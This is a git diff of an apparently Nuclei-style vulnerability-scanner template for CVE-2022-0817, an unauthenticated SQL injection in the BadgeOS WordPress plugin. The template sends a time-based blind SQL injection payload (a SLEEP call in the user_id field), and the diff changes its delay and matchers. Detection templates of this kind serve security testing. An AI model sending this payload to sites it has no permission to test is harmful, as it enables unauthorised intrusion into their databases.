diff --git a/cves/2022/CVE-2022-0817.yaml b/cves/2022/CVE-2022-0817.yaml index 5f70601fbd..9b4e840d91 100644 --- a/cves/2022/CVE-2022-0817.yaml +++ b/cves/2022/CVE-2022-0817.yaml @@ -1,7 +1,7 @@ id: CVE-2022-0817 info: - name: BadgeOS < 3.7.1 - Unauthenticated SQLi + name: BadgeOS < 3.7.1 - Unauthenticated SQL Injection author: theamanrawat severity: critical description: | @@ -11,13 +11,10 @@ info: - https://wordpress.org/plugins/badgeos/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0817 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 cve-id: CVE-2022-0817 - cwe-id: CWE-89 metadata: - verified: "true" - tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,badgeos,unauth + verified: true + tags: cve,cve2022,wordpress,wp-plugin,wp,badgeos,unauth,sqli requests: - raw: @@ -27,13 +24,13 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - action=get-achievements&total_only=true&user_id=11+AND+(SELECT+9628+FROM+(SELECT(SLEEP(5)))WOrh)--+KUsb + action=get-achievements&total_only=true&user_id=11+AND+(SELECT+9628+FROM+(SELECT(SLEEP(6)))WOrh)--+KUsb matchers: - type: dsl dsl: - - 'duration>=5' + - 'duration>=6' - 'status_code == 200' - 'contains(content_type, "application/json")' - - 'contains(body, "11 AND (SELECT 9628 FROM (SELECT(SLEEP(5)))WOrh)-- KUsb")' - condition: and \ No newline at end of file + - 'contains(body, "badgeos-arrange-buttons")' + condition: and